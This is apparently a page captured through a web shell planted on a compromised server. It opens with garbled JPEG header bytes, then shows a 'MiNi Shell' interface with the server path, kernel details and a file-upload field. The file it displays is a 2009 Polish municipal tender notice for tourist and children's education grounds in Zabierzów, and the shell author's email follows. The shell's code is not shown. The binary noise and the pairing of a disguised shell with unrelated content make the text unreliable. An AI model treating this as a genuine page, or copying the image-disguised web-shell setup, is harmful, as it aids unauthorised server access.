JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/174049-N-2009.html

<p class="kh_header"><b>Zabierzów: Urządzenie terenów rekreacji turystycznej i edukacji dziecięcej w ramach działania
MPRO (II) 3.1 Rozwój infrastruktury turystycznej pn.
Jurajski Raj w Gminie Zabierzów - Produkt i Oferta Turystyczna
polegające na budowie, montażu i dostawie urządzeń i obiektów.</b><br>
<b>Numer ogłoszenia: 174049 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zabierzów , ul. Kolejowa 11, 32-080 Zabierzów, woj. małopolskie, tel. (012) 285 11 40, faks (012) 285 21 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabierzow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie terenów rekreacji turystycznej i edukacji dziecięcej w ramach działania
MPRO (II) 3.1 Rozwój infrastruktury turystycznej pn.
Jurajski Raj w Gminie Zabierzów - Produkt i Oferta Turystyczna
polegające na budowie, montażu i dostawie urządzeń i obiektów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Szczegółowy opis przedmiotu zamówienia zawiera:

1) Załącznik Nr 1 - Przedmiot zamówienia - opisuje w sposób szczegółowy zakres robót do wykonania dla wszystkich 13 lokalizacji wraz z podaniem miejscowości i numerów ewidencyjnych działek;

2. Załącznik Nr 2  - Opis techniczny - określa w sposób szczegółowy program użytkowy, charakterystykę, rozwiązania konstrukcyjne i materiałowe dla wszystkich typów budynków i tablic informacyjnych, podaje charakterystyki zastosowanych nawierzchni i urządzeń;

3. Załącznik Nr 3 - Rysunki wykonawcze :
a) tablice reklamowe B, C;
b) wiata - budynek gospodarczy typ A;
c) budynek gospodarczy typ B;
d) budynek gospodarczy typ C;

4. Załącznik Nr 4 - Schematy konstrukcji murowych i szkieletowych oraz mieszanych dla podstawowych form geometrycznych zastosowanych w projekcie ścieżek edukacyjnych:
a) w wiosce dziecięcej Skalny Raj w Kobylanach, 
b) w wiosce dziecięcej Skalny Raj w Nielepicach, 
c) w wiosce dziecięcej Kraina Skarbów w Aleksandrowicach;

5. Załącznik Nr 5 - Schematy konstrukcji mieszanych dla podstawowych form geometrycznych zastosowanych w projekcie ścieżek edukacyjnych, urządzenie stanowisk:
a) Stanowisko poszukiwania skarbów w Aleksandrowicach,
b) Stanowiska poszukiwania złota  w Kobylanach,
c) Stanowisko Przygody Paleontologicznej w Kobylanach,
d) Stanowisko Przygody Paleontologicznej w Nielepicach,
e) Stanowisko Poszukiwania Kości Mamuta w Nielepicach;

6. Załącznik Nr 6 - Mapki ewidencyjne - z opisem i schematycznym usytuowaniem budynków i urządzeń dla wszystkich 13 lokalizacji;

7. Załącznik Nr 7 - Dokumentacja fotograficzna - wybrane zdjęcia obrazujące ukształtowanie terenu i szatę roślinną dla wszystkich 13 lokalizacji w 9 miejscowościach;

8. Załącznik Nr 8 - Specyfikacja techniczna dla:
a) utwardzonej nawierzchni zielonej - panel trawnikowy,
b) nawierzchni z kostki brukowej betonowej,
c) konstrukcji drewnianych,
d) konstrukcji betonowych;
e) tablic reklamowych
f) gablot..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.12.91-4, 45.11.27.10-5, 45.11.27.20-8, 45.21.21.40-9, 45.23.31.61-5, 45.26.10.00-4, 45.42.20.00-1, 45.26.23.00-4, 45.26.23.10-7, 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 15 000,00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Do przetargu zostaną zakwalifikowani Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie
innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych
do wykonania zamówienia.
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia;
4) nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

2. Wykonawcy muszą spełniać następujące warunki: 
1)  wykazać się wykonaniem w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, minimum 2 robotami budowlanymi odpowiadającymi swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tzn. roboty polegające na kompleksowym zagospodarowaniu terenu dla potrzeb turystyki, rekreacji i edukacji, tj. budową różnego typu nawierzchni (trawiaste, żwirowe, z kostki brukowej), budową obiektów małej architektury (budynki, wiaty) o konstrukcji drewnianej, dostawą i montażem tablic  informacyjnych, urządzeniem terenów zielonych o łącznej wartości 100.000 zł brutto każda, potwierdzone dokumentami należytego wykonania robót.
2) posiadać w dyspozycji personel:
 kierownika budowy z uprawnieniami w specjalności konstrukcyjno - budowlanej oraz wykazać, że przynależy do Polskiej Izby Inżynierów Budownictwa;

3. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na minimum 300.000 złotych;

4. Wykonawca musi posiadać zdolność finansową do wykonania zamówienia potwierdzoną jednym z 2-ch dokumentów:
1) informację z banku potwierdzającą wielkość posiadanych środków na rachunku   
 bankowym w wysokości min. 200.000 zł, wystawioną nie wcześniej niż 3 miesiące 
przed upływem terminu składania ofert;
2) informację z banku potwierdzającą zdolność kredytową w wysokości  200.000 zł. lub    niższą o ile suma zdolności kredytowej i posiadanych środków na rachunku bankowym wynosi nie mniej niż 200.000 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W celu potwierdzenia spełnienia opisanych wyżej warunków, Wykonawca musi załączyć    
do oferty oświadczenia lub dokumenty wymagane w ust. III. Ocena spełnienia ww 
warunków dokonana zostanie z formuła spełnia - nie spełnia w oparciu o oświadczenia 
lub dokumenty załączone do oferty. Z treści przedstawionych dokumentów musi 
wynikać jednoznacznie, że ww. warunki Wykonawca spełnia. Niespełnienie chociażby 
jednego z warunków udziału w przetargu skutkować będzie wykluczeniem Wykonawcy z 
postępowania i odrzuceniem oferty.

5. Termin zakończenia realizacji przedmiotu umowy może ulec przesunięciu w przypadku 
    opóźnień wynikających z:
1) działania siły wyższej, np. klęski żywiołowej, 
2) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo   
        zachowania należytej staranności. Fakty te muszą mieć odzwierciedlenie w dzienniku   
        budowy i muszą być potwierdzone przez inspektora nadzoru.

W przedstawionych przypadkach wystąpienia opóźnień strony ustalą nowe terminy   
    realizacji z  tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie    
    okresowi przerwy lub postoju..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Opis przedmiotu zamówienia lub oświadczenie złożone na druku OFERTA zał. nr 1 zgodności przedmiotu oferty z przedmiotem zamówienia.

2.	Pełnomocnictwo - w przypadku podpisywania oferty i pozostałych dokumentów przez 
pełnomocnika. Właściwie sporządzone i podpisane pełnomocnictwo należy dołączyć do oferty (załączyć jeżeli dotyczy).

 3. Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji 
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 
miesięcy przed upływem terminu składania ofert (określający pełną nazwę firmy, 
stan prawny, miejsce rejestracji, dokładny adres firmy składającej ofertę, jednocześnie
 potwierdzający, że profil działania Wykonawcy odpowiada profilowi robót objętych 
przetargiem).

4. Umowę regulującą współpracę podmiotów występujących wspólnie, np. umowa 
spółki cywilnej lub inne ( załączyć jeżeli dotyczy).

5. Oświadczenie Wykonawcy w trybie art.22 ust. 1 Ustawy prawo zamówień publicznych 
oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ww ustawy 
na formularzu stanowiącym  załącznik nr 2.

6. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
Polskiej składa odpowiedni dokument lub dokumenty zgodnie z Rozporządzeniem Prezesa 
Rady Ministrów z dnia 19 maja 2006r w sprawie rodzajów dokumentów, jakich może żądać
Zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane
 ( załączyć jeżeli dotyczy).

7. Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą 
uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji 
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także 
zakresu wykonywanych przez nie czynności na załączniku nr 3 zatytułowanym
 Potencjał kadrowy.
Wymagane minimum potencjału kadrowego:
1 kierownik robót z uprawnieniami w specjalności konstrukcyjno - budowlanej oraz wykazać, że przynależy do Polskiej Izby Inżynierów Budownictwa;
 (Należy udokumentować kwalifikacje zawodowe kierownika).

8. Pisemne  zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt  7, wykonawca wskazał osoby którymi będzie w tym trybie dysponował.

9.Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem 
wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest
 krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom 
budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty
 i miejsca wykonania na załączniku nr 4 zatytułowanym Doświadczenie zawodowe 
oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane 
należycie.
 Wykaz musi posiadać lokalizację, adres inwestora (ewentualnie telefon),
 wartość robót oraz czas realizacji zamówienia (podać daty). 
Wymagane minimum: 2 zrealizowane roboty polegające na kompleksowym 
zagospodarowaniu terenu dla potrzeb turystyki, rekreacji i edukacji, tj. budową różnego
 typu nawierzchni (trawiaste, żwirowe, z kostki brukowej), budową obiektów małej 
architektury (budynki, wiaty) o konstrukcji drewnianej, dostawą i montażem tablic  
informacyjnych, urządzeniem terenów zielonych, o łącznej wartości 100.000 zł brutto każda
 ( roboty muszą być zakończone ).

10. Dokumenty potwierdzające, że roboty o których mowa w pkt. 9 zostały wykonane w 
      terminie i z należytą starannością.

11. Informację banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert.

12. Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od 
 odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 300.000 zł.

Ponadto do oferty należy dołączyć:

13. W załączniku nr 5 zatytułowanym Podwykonawcy żądamy wskazania, jaką cześć 
zamówienia Wykonawca zamierza powierzyć Podwykonawcom.

Jeżeli Wykonawca nie zamierza powierzyć zamówienia podwykonawcy, załącza załącznik 
 nr 5  do oferty z adnotacją nie dotyczy.

14. Wstępny harmonogram terminowo - rzeczowo-finansowy robót przewidujący 
fakturowanie kwartalne, który winien być tak skonstruowany, aby koszty wynagrodzenia 
Wykonawcy ponoszone przez  Zamawiającego kształtowały się w następujący sposób:

koniec IV kwartału 2009     			   - 3,92 %

Rok 2010: 
- na koniec I kwartału 2010			 - 3,92%
- na koniec II kwartału 2010		- 30,72%
- na koniec III kwartału 2010		- 30,72%
- do 31.10.2010				- 30,72%

15. Podpisany lub zaparafowany projekt umowy.

16. Kosztorys ofertowy 


W przypadku podmiotów występujących wspólnie przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w pkt  3, 5 i  6.
Pozostałe dokumenty będą traktowane jako wspólne. 

Jeżeli oferta podmiotów występujących wspólnie, zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Współpracujący Wykonawcy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 

Umowa Konsorcjum musi być zgodna z zapisami kodeksu cywilnego i obejmować zarówno okres realizacji zamówienia, jak również okres gwarancji i rękojmi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zabierzow.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać również w siedzibie Zamawiającego. pok. nr 30 lub za pośrednictwem poczty (opłata 100 zł)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2009 godzina 10:00, miejsce: Urząd Gminy Zabierzów, Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com